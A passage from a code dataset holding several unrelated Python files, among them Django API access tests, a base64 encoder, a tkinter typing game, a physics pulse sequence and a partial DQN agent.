base case with all numbers smaller \n return n * factorial(n - 1)\n \n #Return n! we will get 1 if we search for factorial of 1 hence this code\n return 1\n\n\n\ndef reverse(word):\n\n \"\"\"\n Return a string that has been reversed\n Args:\n word (str): a string \n Returns:\n str: word string reversed and given backwards\n \n Examples:\n >>> reverse('cheese')\n 'eseehc'\n >>> reverse('banana')\n 'ananab'\n >>> reverse('awesome')\n 'emosewa'\n \"\"\"\n if len(word) == 0:\n return word\n else:\n return reverse(word[1:]) + word[0]","sub_path":"AndilePackage/Recursion.py","file_name":"Recursion.py","file_ext":"py","file_size_in_byte":2392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"95011023","text":"import base64\nimport json\nimport random\nfrom io import BytesIO\n\nimport SimpleITK\nimport pytest\nfrom PIL import Image as PILImage\nfrom django.conf import settings\nfrom django.core.cache import cache\nfrom rest_framework import status\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.compat import LONG_SEPARATORS, SHORT_SEPARATORS\nfrom rest_framework.settings import api_settings\nfrom rest_framework.utils import encoders\n\nfrom grandchallenge.retina_api.serializers import (\n TreeImageSerializer,\n TreeObjectSerializer,\n)\nfrom grandchallenge.subdomains.utils import reverse\nfrom tests.cases_tests.factories import (\n ImageFactoryWithImageFile,\n ImageFactoryWithImageFile2DLarge,\n ImageFactoryWithImageFile3DLarge3Slices,\n ImageFactoryWithImageFile3DLarge4Slices,\n)\nfrom tests.retina_api_tests.helpers import (\n batch_test_data_endpoints,\n batch_test_image_endpoint_redirects,\n client_force_login,\n client_login,\n create_datastructures_data,\n get_user_from_str,\n)\n\n\n@pytest.mark.django_db\nclass TestArchiveIndexAPIEndpoints:\n def test_archive_view_non_auth(self, client):\n # Clear cache manually (this is not done by pytest-django for some reason...)\n cache.clear()\n url = 
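Note that `fibonacci` above re-creates `fibonacci_cache` inside the function body, so nothing survives between calls and the memoization never takes effect; hoisting the cache to module scope, or simply using `functools.lru_cache`, gives the intended speed-up:

```python
from functools import lru_cache

@lru_cache(maxsize=None)
def fib(n):
    # Same recurrence, with a cache that persists across calls.
    if n in (1, 2):
        return 1
    return fib(n - 1) + fib(n - 2)

assert fib(10) == 55
```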
reverse(\"retina:api:archives-api-view\")\n response = client.get(url, HTTP_ACCEPT=\"application/json\")\n assert response.status_code == status.HTTP_403_FORBIDDEN\n\n def test_archive_view_normal_non_auth(self, client):\n # Create data\n create_datastructures_data()\n\n # login client\n client, _ = client_login(client, user=\"normal\")\n\n url = reverse(\"retina:api:archives-api-view\")\n response = client.get(url, HTTP_ACCEPT=\"application/json\")\n assert response.status_code == status.HTTP_403_FORBIDDEN\n\n def test_archive_view_retina_auth(self, client):\n # Create data\n create_datastructures_data()\n\n # login client\n client, _ = client_login(client, user=\"retina_user\")\n\n url = reverse(\"retina:api:archives-api-view\")\n response = client.get(url, HTTP_ACCEPT=\"application/json\")\n assert response.status_code == status.HTTP_200_OK\n\n def test_archive_view_returns_correct_data(self, client):\n # Clear cache manually (this is not done by pytest-django for some reason...)\n cache.clear()\n # Create data\n (\n datastructures,\n datastructures_aus,\n oct_obs_registration,\n oct_obs_registration_aus,\n ) = create_datastructures_data()\n\n # login client\n client, _ = client_login(client, user=\"retina_user\")\n\n url = reverse(\"retina:api:archives-api-view\")\n response = client.get(url, HTTP_ACCEPT=\"application/json\")\n response_data = json.loads(response.content)\n # check if correct data is sent\n expected_response_data = {\n \"subfolders\": {\n datastructures[\"archive\"].name: {\n \"subfolders\": {\n datastructures[\"patient\"].name: {\n \"subfolders\": {\n datastructures[\"study_oct\"].name: {\n \"info\": \"level 5\",\n \"images\": {\n datastructures[\"image_oct\"].name: {\n \"images\": {\n \"trc_000\": \"no info\",\n \"obs_000\": str(\n datastructures[\n \"image_obs\"\n ].id\n ),\n \"mot_comp\": \"no info\",\n \"trc_001\": \"no info\",\n \"oct\": str(\n datastructures[\n \"image_oct\"\n ].id\n ),\n },\n \"info\": {\n \"voxel_size\": {\n \"axial\": 0,\n \"lateral\": 0,\n \"transversal\": 0,\n },\n \"date\": datastructures[\n \"study_oct\"\n ].datetime.strftime(\n \"%Y/%m/%d %H:%M:%S\"\n ),\n \"registration\": {\n \"obs\": \"Checked separately\",\n \"trc\": [0, 0, 0, 0],\n },\n },\n }\n },\n \"name\": datastructures[\"study_oct\"].name,\n \"id\": str(datastructures[\"study_oct\"].id),\n \"subfolders\": {},\n },\n datastructures[\"study\"].name: {\n \"info\": \"level 5\",\n \"images\": {\n datastructures[\"image_cf\"].name: str(\n datastructures[\"image_cf\"].id\n )\n },\n \"name\": datastructures[\"study\"].name,\n \"id\": str(datastructures[\"study\"].id),\n \"subfolders\": {},\n },\n },\n \"info\": \"level 4\",\n \"name\": datastructures[\"patient\"].name,\n \"id\": str(datastructures[\"patient\"].id),\n \"images\": {},\n }\n },\n \"info\": \"level 3\",\n \"name\": datastructures[\"archive\"].name,\n \"id\": str(datastructures[\"archive\"].id),\n \"images\": {},\n },\n datastructures_aus[\"archive\"].name: {\n \"subfolders\": {\n datastructures_aus[\"patient\"].name: {\n \"subfolders\": {},\n \"info\": \"level 4\",\n \"name\": datastructures_aus[\"patient\"].name,\n \"id\": str(datastructures_aus[\"patient\"].id),\n \"images\": {\n datastructures_aus[\"image_oct\"].name: {\n \"images\": {\n \"trc_000\": \"no info\",\n \"obs_000\": str(\n datastructures_aus[\"image_obs\"].id\n ),\n \"mot_comp\": \"no info\",\n \"trc_001\": \"no info\",\n \"oct\": str(\n datastructures_aus[\"image_oct\"].id\n ),\n },\n \"info\": {\n \"voxel_size\": {\n \"axial\": 0,\n \"lateral\": 0,\n 
\"transversal\": 0,\n },\n \"date\": datastructures_aus[\n \"study_oct\"\n ].datetime.strftime(\n \"%Y/%m/%d %H:%M:%S\"\n ),\n \"registration\": {\n \"obs\": \"Checked separately\",\n \"trc\": [0, 0, 0, 0],\n },\n },\n },\n datastructures_aus[\"image_cf\"].name: str(\n datastructures_aus[\"image_cf\"].id\n ),\n },\n }\n },\n \"info\": \"level 3\",\n \"name\": datastructures_aus[\"archive\"].name,\n \"id\": str(datastructures_aus[\"archive\"].id),\n \"images\": {},\n },\n },\n \"info\": \"level 2\",\n \"name\": \"Archives\",\n \"id\": \"none\",\n \"images\": {},\n }\n\n # Compare floats separately because of intricacies of floating-point arithmetic in python\n try:\n # Get info objects of both archives in response data\n response_archive_info = (\n response_data.get(\"subfolders\")\n .get(datastructures[\"archive\"].name)\n .get(\"subfolders\")\n .get(datastructures[\"patient\"].name)\n .get(\"subfolders\")\n .get(datastructures[\"study_oct\"].name)\n .get(\"images\")\n .get(datastructures[\"image_oct\"].name)\n .get(\"info\")\n )\n response_archive_australia_info = (\n response_data.get(\"subfolders\")\n .get(datastructures_aus[\"archive\"].name)\n .get(\"subfolders\")\n .get(datastructures_aus[\"patient\"].name)\n .get(\"images\")\n .get(datastructures_aus[\"image_oct\"].name)\n .get(\"info\")\n )\n\n floats_to_compare = (\n []\n ) # list of (response_float, expected_float, name) tuples\n for archive, response_info, oor in (\n (\"Rotterdam\", response_archive_info, oct_obs_registration),\n (\n \"Australia\",\n response_archive_australia_info,\n oct_obs_registration_aus,\n ),\n ):\n # oct obs registration\n response_obs = response_info.get(\"registration\").get(\"obs\")\n rv = oor.registration_values\n floats_to_compare.append(\n (\n response_obs[0],\n rv[0][0],\n archive + \" obs oct registration top left x\",\n )\n )\n floats_to_compare.append(\n (\n response_obs[1],\n rv[0][1],\n archive + \" obs oct registration top left y\",\n )\n )\n floats_to_compare.append(\n (\n response_obs[2],\n rv[1][0],\n archive + \" obs oct registration bottom right x\",\n )\n )\n floats_to_compare.append(\n (\n response_obs[3],\n rv[1][1],\n archive + \" obs oct registration bottom right y\",\n )\n )\n\n # Compare floats\n for result, expected, name in floats_to_compare:\n if result != pytest.approx(expected):\n pytest.fail(name + \" does not equal expected value\")\n\n # Clear voxel and obs registration objects before response object to expected object comparison\n response_data[\"subfolders\"][datastructures[\"archive\"].name][\n \"subfolders\"\n ][datastructures[\"patient\"].name][\"subfolders\"][\n datastructures[\"study_oct\"].name\n ][\n \"images\"\n ][\n datastructures[\"image_oct\"].name\n ][\n \"info\"\n ][\n \"registration\"\n ][\n \"obs\"\n ] = \"Checked separately\"\n\n response_data[\"subfolders\"][datastructures_aus[\"archive\"].name][\n \"subfolders\"\n ][datastructures_aus[\"patient\"].name][\"images\"][\n datastructures_aus[\"image_oct\"].name\n ][\n \"info\"\n ][\n \"registration\"\n ][\n \"obs\"\n ] = \"Checked separately\"\n\n except (AttributeError, KeyError, TypeError):\n pytest.fail(\"Response object structure is not correct\")\n\n assert response_data == expected_response_data\n\n def test_caching(self, client):\n # Clear cache manually\n cache.clear()\n # Perform normal request\n datastructures, _, _, _ = create_datastructures_data()\n client, _ = client_login(client, user=\"retina_user\")\n url = reverse(\"retina:api:archives-api-view\")\n response = client.get(url, 
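The registration values above are compared through `pytest.approx` rather than `==` because they come out of floating-point arithmetic; the difference in two lines:

```python
import pytest

assert 0.1 + 0.2 != 0.3                  # plain equality fails
assert 0.1 + 0.2 == pytest.approx(0.3)   # approx applies a relative tolerance
```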
HTTP_ACCEPT=\"application/json\")\n response_data = json.loads(response.content)\n # Remove archive and perform request again\n datastructures[\"archive\"].delete()\n response = client.get(url, HTTP_ACCEPT=\"application/json\")\n # Check that response is cached so it is not changed\n assert json.loads(response.content) == response_data\n\n\n@pytest.mark.django_db\nclass TestImageAPIEndpoint:\n # test methods are added dynamically\n pass\n\n\nbatch_test_image_endpoint_redirects(TestImageAPIEndpoint)\n\n\n@pytest.mark.django_db\nclass TestDataAPIEndpoint:\n # test methods are added dynamically\n pass\n\n\nbatch_test_data_endpoints(TestDataAPIEndpoint)\n\n\n@pytest.mark.django_db\nclass TestImageElementSpacingView:\n @pytest.mark.parametrize(\n \"user\", [\"anonymous\", \"normal\", \"staff\", \"retina_user\"]\n )\n def test_no_access(self, client, user):\n image = ImageFactoryWithImageFile()\n url = reverse(\"retina:api:image-element-spacing-view\", args=[image.pk])\n client, _ = client_login(client, user=user)\n response = client.get(url)\n assert response.status_code == status.HTTP_403_FORBIDDEN\n\n @pytest.mark.parametrize(\n \"user,expected_status\",\n [\n (\"anonymous\", status.HTTP_403_FORBIDDEN),\n (\"normal\", status.HTTP_403_FORBIDDEN),\n (\"staff\", status.HTTP_403_FORBIDDEN),\n (\"retina_user\", status.HTTP_200_OK),\n ],\n )\n def test_access(self, client, user, expected_status):\n image = ImageFactoryWithImageFile()\n image.permit_viewing_by_retina_users()\n url = reverse(\"retina:api:image-element-spacing-view\", args=[image.pk])\n client, _ = client_login(client, user=user)\n response = client.get(url)\n assert response.status_code == expected_status\n\n def test_returns_correct_spacing(self, client):\n image = ImageFactoryWithImageFile()\n image.permit_viewing_by_retina_users()\n url = reverse(\"retina:api:image-element-spacing-view\", args=[image.pk])\n client, _ = client_login(client, user=\"retina_user\")\n response = client.get(url)\n assert response.status_code == status.HTTP_200_OK\n r = response.json()\n assert list(image.get_sitk_image().GetSpacing()) == r\n\n\n@pytest.mark.django_db\nclass TestArchiveAPIView:\n @staticmethod\n def perform_request(client, user, pk=None):\n url = reverse(\n \"retina:api:archive-data-api-view\",\n args=[pk] if pk is not None else [],\n )\n user_model = get_user_from_str(user)\n kwargs = {}\n if user_model is not None and not isinstance(user_model, str):\n token_object, _ = Token.objects.get_or_create(user=user_model)\n kwargs.update({\"HTTP_AUTHORIZATION\": f\"Token {token_object.key}\"})\n return client.get(url, **kwargs)\n\n @staticmethod\n def expected_result_json(objects, images):\n objects_serialized = TreeObjectSerializer(objects, many=True).data\n images_serialized = TreeImageSerializer(images, many=True).data\n\n response = {\n \"directories\": sorted(objects_serialized, key=lambda x: x[\"name\"]),\n \"images\": sorted(images_serialized, key=lambda x: x[\"name\"]),\n }\n return json.dumps(\n response,\n cls=encoders.JSONEncoder,\n ensure_ascii=not api_settings.UNICODE_JSON,\n allow_nan=not api_settings.STRICT_JSON,\n separators=SHORT_SEPARATORS\n if api_settings.COMPACT_JSON\n else LONG_SEPARATORS,\n )\n\n @pytest.mark.parametrize(\n \"user,expected_status\",\n [\n (\"anonymous\", status.HTTP_401_UNAUTHORIZED),\n (\"normal\", status.HTTP_403_FORBIDDEN),\n (\"staff\", status.HTTP_403_FORBIDDEN),\n (\"retina_user\", status.HTTP_200_OK),\n ],\n )\n def test_access(self, client, user, expected_status):\n response = 
self.perform_request(client, user)\n assert response.status_code == expected_status\n\n def test_empty(self, client):\n # Clear cache manually\n cache.clear()\n response = self.perform_request(client, \"retina_user\")\n assert response.status_code == status.HTTP_200_OK\n assert response.content == b'{\"directories\":[],\"images\":[]}'\n\n @pytest.mark.parametrize(\n \"pk,objects,images\",\n [\n (None, [\"archive1\", \"archive2\"], None),\n (\"archive1\", [\"patient11\", \"patient12\"], None),\n (\"patient11\", [\"study111\", \"study112\", \"study113\"], None),\n (\"study111\", [], \"images111\"),\n (\"archive2\", [], \"images211\"),\n ],\n )\n def test_with_data_patient(\n self, client, archive_patient_study_image_set, pk, objects, images\n ):\n # Clear cache manually\n cache.clear()\n if pk is not None:\n pk = getattr(archive_patient_study_image_set, pk).pk\n response = self.perform_request(client, \"retina_user\", pk)\n assert response.status_code == status.HTTP_200_OK\n objects = [\n getattr(archive_patient_study_image_set, o) for o in objects\n ]\n imgs = []\n if images is not None:\n imgs = getattr(archive_patient_study_image_set, images)\n assert response.content.decode() == self.expected_result_json(\n objects, imgs\n )\n\n def test_caching(self, client, archive_patient_study_image_set):\n # Clear cache manually\n cache.clear()\n # Perform normal request\n response = self.perform_request(client, \"retina_user\")\n assert response.status_code == status.HTTP_200_OK\n json_response = response.content.decode()\n # Remove data\n archive_patient_study_image_set.archive1.delete()\n archive_patient_study_image_set.archive2.delete()\n # Perform request again and expect unchanged response\n response = self.perform_request(client, \"retina_user\")\n assert response.status_code == status.HTTP_200_OK\n assert response.content.decode() == json_response\n\n\n@pytest.mark.django_db\nclass TestBase64ThumbnailView:\n @pytest.mark.parametrize(\n \"user,expected_status\",\n [\n (\"anonymous\", status.HTTP_401_UNAUTHORIZED),\n (\"normal\", status.HTTP_403_FORBIDDEN),\n (\"staff\", status.HTTP_403_FORBIDDEN),\n (\"retina_user\", status.HTTP_200_OK),\n ],\n )\n def test_access_and_defaults(self, client, user, expected_status):\n image = ImageFactoryWithImageFile()\n image.permit_viewing_by_retina_users()\n url = reverse(\"retina:api:image-thumbnail\", kwargs={\"pk\": image.pk})\n user_model = get_user_from_str(user)\n kwargs = {}\n if user_model is not None and not isinstance(user_model, str):\n token_object, _ = Token.objects.get_or_create(user=user_model)\n kwargs.update({\"HTTP_AUTHORIZATION\": f\"Token {token_object.key}\"})\n response = client.get(url, **kwargs)\n assert response.status_code == expected_status\n\n @staticmethod\n def perform_thumbnail_request(client, image, max_dimension):\n image.permit_viewing_by_retina_users()\n kwargs = {\"pk\": image.id}\n if max_dimension != settings.RETINA_DEFAULT_THUMBNAIL_SIZE:\n kwargs.update({\"width\": max_dimension, \"height\": max_dimension})\n url = reverse(\"retina:api:image-thumbnail\", kwargs=kwargs)\n client, user_model = client_force_login(client, user=\"retina_user\")\n token = f\"Token {Token.objects.create(user=user_model).key}\"\n response = client.get(url, HTTP_AUTHORIZATION=token)\n return response\n\n @staticmethod\n def get_b64_from_image(image, max_dimension, is_3d=False):\n image_sitk = image.get_sitk_image()\n image_nparray = SimpleITK.GetArrayFromImage(image_sitk)\n if is_3d:\n depth = image_sitk.GetDepth()\n assert depth > 0\n # Get 
center slice of 3D image\n image_nparray = image_nparray[depth // 2]\n\n image_pil = PILImage.fromarray(image_nparray)\n image_pil.thumbnail((max_dimension, max_dimension), PILImage.ANTIALIAS)\n buffer = BytesIO()\n image_pil.save(buffer, format=\"png\")\n image_base64_str = base64.b64encode(buffer.getvalue())\n return image_base64_str\n\n def do_test_thumbnail_creation(\n self, client, max_dimension, image, is_3d=False\n ):\n response = self.perform_thumbnail_request(client, image, max_dimension)\n\n assert response.status_code == status.HTTP_200_OK\n image_base64_str = self.get_b64_from_image(image, max_dimension, is_3d)\n\n returned_img = PILImage.open(\n BytesIO(base64.b64decode(response.content))\n )\n assert response.content == image_base64_str\n width, height = returned_img.size\n assert max(width, height) == max_dimension\n\n @pytest.mark.parametrize(\n \"is_3d,image_factory\",\n [\n (False, ImageFactoryWithImageFile2DLarge),\n (True, ImageFactoryWithImageFile3DLarge3Slices),\n (True, ImageFactoryWithImageFile3DLarge4Slices),\n ],\n )\n @pytest.mark.parametrize(\"max_dimension\", [\"default\", \"random\"])\n def test_correct_image(self, client, max_dimension, is_3d, image_factory):\n image = image_factory()\n if max_dimension == \"random\":\n max_dimension = random.randint(1, 255)\n else:\n max_dimension = settings.RETINA_DEFAULT_THUMBNAIL_SIZE\n self.do_test_thumbnail_creation(\n client, max_dimension, image, is_3d=is_3d\n )\n","sub_path":"app/tests/retina_api_tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":23415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"104817886","text":"#n = int(input())\nn, m = map(int, input().split())\n#l = list(map(int,input().split()))\nal = [list(input()) for i in range(n)]\nbl = [list(input()) for i in range(m)]\n\n\ndef same(i, j):\n res = True\n for row in range(m):\n for col in range(m):\n if al[i+row][j+col] != bl[row][col]:\n res = False\n return res\n\n\nans = 'No'\nfor i in range(n-m+1):\n for j in range(n-m+1):\n if same(i, j):\n ans = 'Yes'\nprint(ans)\n","sub_path":"ABC054/ABC054_A.py","file_name":"ABC054_A.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"548355943","text":"from common.lib.servers.Pulser2.pulse_sequences.pulse_sequence import pulse_sequence\nfrom Qsim.scripts.pulse_sequences.sub_sequences.doppler_cooling import DopplerCooling\nfrom Qsim.scripts.pulse_sequences.sub_sequences.microwave_pulse_sequences.microwave_interrogation_minus import MicrowaveInterrogationMinus\nfrom Qsim.scripts.pulse_sequences.sub_sequences.turn_off_all import TurnOffAll\nfrom Qsim.scripts.pulse_sequences.sub_sequences.state_detection.standard_state_detection import StandardStateDetection\nfrom Qsim.scripts.pulse_sequences.sub_sequences.optical_pumping import OpticalPumping\n\n\nclass MicrowavePointMinus(pulse_sequence):\n\n required_subsequences = [TurnOffAll, DopplerCooling,\n MicrowaveInterrogationMinus,\n StandardStateDetection,\n OpticalPumping]\n\n required_parameters = [\n ]\n\n def sequence(self):\n p = self.parameters\n\n self.addSequence(TurnOffAll)\n self.addSequence(DopplerCooling)\n self.addSequence(OpticalPumping)\n self.addSequence(MicrowaveInterrogationMinus)\n 
self.addSequence(StandardStateDetection)\n","sub_path":"scripts/pulse_sequences/microwave_point/microwave_point_minus.py","file_name":"microwave_point_minus.py","file_ext":"py","file_size_in_byte":1168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"126464217","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Feb 17 17:06:30 2021\n\n@author: hossein\n\"\"\"\nimport numpy as np\nimport torch\nimport os \n\n\ndef data_delivery(main_path,\n                  path_attr=None,\n                  path_start=None,\n                  only_id=False,\n                  double = True,\n                  need_collection=False,\n                  need_attr=True):\n    '''\n    \n\n    Parameters\n    ----------\n    main_path : TYPE string\n        DESCRIPTION. the path of the images folder\n    path_attr : TYPE numpy array\n        DESCRIPTION.\n    path_start : TYPE \n        DESCRIPTION.\n    double : TYPE true/false\n        DESCRIPTION. will double everything and return it \n    need_collection : TYPE true/false\n        DESCRIPTION. The default is False.\n        if it is false, returns a tuple that contains a list of \n        image_names and their attributes in numpy and a list of ids \n    need_attr : when we want to see the whole attributes as a target vector \n    Returns\n    only_id : when you need only id and id_weights. \n    -------\n    None.\n\n    '''\n    \n    if path_attr:\n        # loading attributes\n        start_point = np.load(path_start)\n        attr_vec_np = np.load(path_attr)  # loading attributes\n        \n        # attributes\n        attr_vec_np = attr_vec_np.astype(np.int32)\n        attr_vec_np = attr_vec_np[:start_point]\n        if double:\n            attr_vec_np = np.append(attr_vec_np,attr_vec_np,axis=0)\n    \n    # images names\n    \n    img_names = os.listdir(main_path)\n    img_names.sort()\n    if only_id:\n        pass\n    else:\n        img_names = img_names[:start_point]\n    img_names = np.array(img_names)\n    if double:\n        img_names = list(np.append(img_names,img_names,axis=0))\n    \n    # ids & ids_weights\n    id_ = []\n    cam_id = []\n    for name in img_names:\n        b = name.split('_')\n        id_.append(int(b[0])-1)\n        cam_id.append(int(b[1][1]))\n    id_ = torch.from_numpy(np.array(id_))  # because a list doesn't accept a list of indexes; it must be a slice or integers.\n    cam_id = np.array(cam_id)\n    # numbers = torch.unique(id_) # return individual numbers in a tensor\n    iterations = torch.bincount(id_) # return iterations of each individual number \n    gp = (int(torch.max(iterations))-int(torch.min(iterations)))//5\n    min_it = int(torch.min(iterations))\n    id_weights = torch.ones(iterations.size())\n    \n    for j in range(len(id_weights)):\n        if min_it Menu:\n    system_tray = MagicMock()\n    node_set = MagicMock()\n    node_set.lnd.rest_url = 'test rest'\n    node_set.lnd.macaroon_path = 'test macaroon'\n    menu = Menu(node_set=node_set, system_tray=system_tray)\n    return menu\n\n\nclass TestJouleLayout(object):\n    def test_copy_rest(self, menu: Menu, qtbot: QTest):\n        menu.joule_url_action.trigger()\n        assert QClipboard().text() == 'test rest'\n\n    @patch('node_launcher.gui.menu.reveal')\n    def test_show_macaroons(self, reveal_patch: MagicMock,\n                            menu: Menu, qtbot: QTest):\n        menu.joule_macaroons_action.trigger()\n        reveal_patch.assert_called_with('test macaroon')\n","sub_path":"tests/test_gui/test_network_buttons/test_joule_layout.py","file_name":"test_joule_layout.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"16237792","text":"'''\nAuthor: Jim Huang\nDate: 2022-01-30 10:17:04\nLastEditors: Jim Huang\nLastEditTime: 2022-01-30 10:50:21\nDescription: base64 \n'''\n\n\nalphabet = 
b\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\n\ndef base64encode(src:str):\n    ret = bytearray()\n    if isinstance(src,str):\n        _src = src.encode()\n    else:\n        return\n\n    length = len(_src)\n    \n    # r records how many zero bytes were appended as padding\n    r = 0\n    for offset in range(0,length,3):\n        triple = _src[offset:offset+3]\n        if offset +3 > length:\n            r = 3 - len(triple)\n            triple += b'\\x00'*r\n        b = int.from_bytes(triple,\"big\")\n        for i in range(18,-1,-6):\n            if i == 18:\n                index = b >> i\n            else:\n                index = b >> i & 0x3F\n            ret.append(alphabet[index])\n    if r:\n        ret[-r:] = b\"=\"*r\n    return bytes(ret)\n\n\nimport base64\n\nstrlist = [\"a\",\"`\",\"ab\",\"abc\",\"abcd\",\"ManMa\",\"教育a\"]\nfor x in strlist:\n    print(x)\n    print(base64encode(x))\n    print(base64.b64encode(x.encode()))\n    print()","sub_path":"MagePython/Chapter4/homework-2.py","file_name":"homework-2.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
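The record above builds base64 by packing each 3-byte group into a 24-bit integer, slicing it into four 6-bit alphabet indexes, and overwriting the padded positions with '='. A minimal standalone walk-through of that bit arithmetic for a 2-byte input (the names below are illustrative, not taken from the record; the final assert checks the result against the stdlib):

import base64

ALPHABET = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

triple = b"ab" + b"\x00"                     # pad 2 bytes up to 3; r = 1
b24 = int.from_bytes(triple, "big")          # 0x616200, one 24-bit block
indexes = [(b24 >> shift) & 0x3F for shift in (18, 12, 6, 0)]  # [24, 22, 8, 0]
chars = bytes(ALPHABET[i] for i in indexes)  # b'YWIA'
encoded = chars[:-1] + b"="                  # replace the r padded sextets -> b'YWI='
assert encoded == base64.b64encode(b"ab")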
+{"seq_id":"239323944","text":"words = ['Apple','gun','Orange','umbrella','pumpkin','Greps','Guava','PEACOCK','LION','TIGER',\n         'APPLE','PINEAPPLE','POT','UNICORN','WATCH','TWILIGHT','WATERMELON','MANGO','sun',\n         'moon','star','planet','master','MUCH-kin','-----','......','/////','?????']\n\n\n\ndef labelslider():\n    global count,sliderWord\n    text = 'Welcome to speed typing game'\n    if count >= len(text):\n        count = 0\n        sliderWord = ''\n    sliderWord += text[count]\n    count += 1\n    rootLebel1.configure(text=sliderWord)\n    rootLebel1.after(150,labelslider)\ndef timeleft():\n    global time,score,miss\n    if time > 0:\n        time -= 1\n        TimerLimitCount.configure(text=time)\n        TimerLimitCount.after(1000,timeleft)\n        if(time < 11):\n            TimerLimitCount.configure(fg='red')\n    else:\n        gamePlaydetaillabel.configure(text='hit={} | miss={} | TotalScore={}'.format(score,miss,score-miss))\n        rr = messagebox.askretrycancel(\"Notification\",'To play again hit retry button')\n        if rr == True:\n            score = 0\n            time = 60\n            miss = 0\n            scoreLableCount.configure(text=score)\n            TimerLimitCount.configure(text=time)\n            wordLebel1.configure(text=words[0])\n\n\n\n\ndef startgame(event):\n    global score,miss\n    if time == 60:\n        timeleft()\n    gamePlaydetaillabel.configure(text='')\n    if wordEntry.get() == wordLebel1['text']:\n        score += 1\n        scoreLableCount.configure(text=score)\n    else:\n        miss += 1\n\n    random.shuffle(words)\n    wordLebel1.configure(text=words[0])\n    wordEntry.delete(0,END)\n\n\n\n\n\n\n\nfrom tkinter import messagebox\nimport random\nfrom tkinter import *\n\n####################### root method\nroot = Tk()\nroot.geometry('800x600+300+100')\nroot.configure(bg=\"light blue\")\nroot.title(\"Speed Typing Game\")\n#root.maxsize(height=600,width=800)\n#root.minsize(height=600,width=800)\nroot.iconbitmap(\"Yootheme-Social-Bookmark-Social-twitter-box-blue.ico\")\nroot.bind('<Return>',startgame)\n############################################# Variable\nscore = 0\ntime = 60\ncount = 0\nsliderWord = ''\nmiss = 0\n#_____________________Level Method_______________________\nrootLebel1 = Label(root,text=\"\",bg=\"light blue\",font=(\"arial\",25,\"italic bold\"),fg=\"red\",width=40)\nrootLebel1.place(x=10,y=10)\nlabelslider()\n\n\nrandom.shuffle(words)\nwordLebel1 = Label(root,text=words[0],font=('arial',35,\"italic bold\"),bg=\"light blue\")\nwordLebel1.place(x=300,y=200)\n\nscoreLabel1 = Label(root,text=\"Your Score:\",font=('arial',25,'italic bold'),bg='light blue',fg='black')\nscoreLabel1.place(x=10,y=100)\n\nscoreLableCount = Label(root,text=score,font=('arial',25,'italic bold'),bg=\"light blue\",fg=\"black\")\nscoreLableCount.place(x=60,y=150)\n\nTimerLimit = Label(root,text='Time left:',font=('arial',25,'italic bold'),bg='light blue',fg='black')\nTimerLimit.place(x=550,y=100)\n\nTimerLimitCount = Label(root,text=time,font=('arial',25,'italic bold'),bg='light blue',fg='black')\nTimerLimitCount.place(x=600,y=150)\n\n\ngamePlaydetaillabel = Label(root,text='Type Word and Hit Enter Button',font=('arial',25,'italic bold'),bg='light blue',fg='gray')\ngamePlaydetaillabel.place(x=150,y=500)\n\n#____________________________Entry Method__________________\nwordEntry = Entry(root,font=('arial',25,\"italic bold\"),bd=10,justify=\"center\")\nwordEntry.place(x=220,y=300)\nwordEntry.focus_set()\n\n\nroot.mainloop()","sub_path":"TypingSpeedGame.py","file_name":"TypingSpeedGame.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"374362195","text":"from pathlib import Path\n\nimport torch\nfrom Networks.basic_network import BasicCNN\nimport numpy as np\nfrom Networks.curiosity import Curiosity\nfrom utils.replay_memory import ReplayMemory\nfrom utils.util import get_training_sample\nfrom copy import deepcopy\n\n\n\nclass DqnAgent:\n    def __init__(self, nb_actions, epsilon, capacity, num_episodes, learning_rate, batch_size, save_dir, curiosity=False):\n        self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n        self.nb_actions = nb_actions\n        self.network = BasicCNN(self.nb_actions).to(self.device)\n        self.save_dir = save_dir\n        self.save_dir.mkdir(parents=True, exist_ok=True)\n        self.target_network = deepcopy(self.network)\n        self.epsilon = epsilon\n        self.replay_memory = ReplayMemory(capacity)\n        self.batch_size = batch_size\n        self.gamma = 0.999\n        self.loss_function = torch.nn.MSELoss()\n        self.loss_function_state = torch.nn.BCEWithLogitsLoss()\n        self.optimizer = torch.optim.RMSprop(self.network.parameters(), lr=learning_rate, weight_decay=1e-5)\n        self.loss_names = [\"Q-value loss\", \"State loss\"]\n        self.loss_per_episode = {loss_name: {i: [] for i in range(1, num_episodes + 1)} for loss_name in self.loss_names}\n        self.iterations = 0\n        if curiosity:\n            print(\"Using curiosity for exploration\")\n            self.curiosity_network = Curiosity()\n\n    def select_action(self, state):\n        if np.random.uniform() > self.epsilon:\n            action = self.greedy_action(state)\n        else:\n            action = self.random_action()\n        return action\n\n    def greedy_action(self, state):\n        state = torch.FloatTensor(state).to(self.device).unsqueeze(0).unsqueeze(0)\n        with torch.no_grad():\n            q_values, _ = self.network(state)\n        best_action = torch.argmax(q_values.detach().cpu(), dim=1).item()\n        return best_action\n\n    def random_action(self):\n        return np.random.randint(self.nb_actions)\n\n    def update_network(self):\n        self.target_network = deepcopy(self.network)\n        print(\"Target network updated\")\n\n    def update_model(self, episode):\n        if len(self.replay_memory) < 1000:\n            return\n\n        state, action, reward, next_state, done = get_training_sample(self.replay_memory, self.batch_size, self.device)\n\n        predicted_q_values, next_state_pred = self.network(state.unsqueeze(dim=1))\n        predicted_q_values = 